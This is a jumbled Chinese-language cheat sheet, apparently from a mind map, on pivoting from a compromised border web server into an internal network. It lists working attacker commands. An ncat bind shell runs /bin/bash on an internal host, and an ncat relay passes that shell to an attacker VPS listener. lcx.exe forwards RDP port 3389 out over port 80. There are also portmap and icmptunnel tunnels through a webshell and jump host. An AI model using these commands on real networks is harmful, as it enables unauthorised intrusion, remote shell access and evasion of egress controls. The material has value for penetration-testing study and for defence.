./icmptunnel -s /sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0
限制
本地转发到VPS:lcx.exe -tran 3389 VPS_ip 80
边界web服务器
边界主机的3389端口不出网,但是80端口出网
ncat --sh-exec \"ncat 内网主机ip 3389\" -l 9999 --keep-open
webshell
跳板机
内网主机,仅仅可与边界主机通信
portmap内网代理工具,通过webshell,以跳板机可以访问内网,将内网主机端口转发到边界服务器的指定端口。我们访问边界服务器的指定端口,即可访问内网服务器对应端口服务
hacker
./portmap -m 1 -p1 边界服务器端口 -h2 内网ip -p2 内网端口
ncat -v VPS_ip 4444 -c \"nc -v 内网主机ip 1111\"
80端口
本地转发到本地lcx.exe -tran 80 127.0.0.1 3389
portmap实现本地端口转发,远程主机转发
ncat是netcat的升级版,实现内网代理,拿到通过tcp传数据的shell。vps主机监听本地端口,内网主机监听端口执行shell。跳板机连接内网监听的端口,将执行结果给vps监听的端口
./icmptunnel VPS(kali)ip/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0
VPS(kali)攻击机
边界服务器
ncat -lvp 4444
nc也可以实现端口转发,将执行内网端口的结果发给跳板机的出网端口
企业内网环境
icmptunnel隧道代理工具,通过VPS作为服务器端。将跳板机的流量转发给vps
ncat -lvp 1111 -e /bin/bash
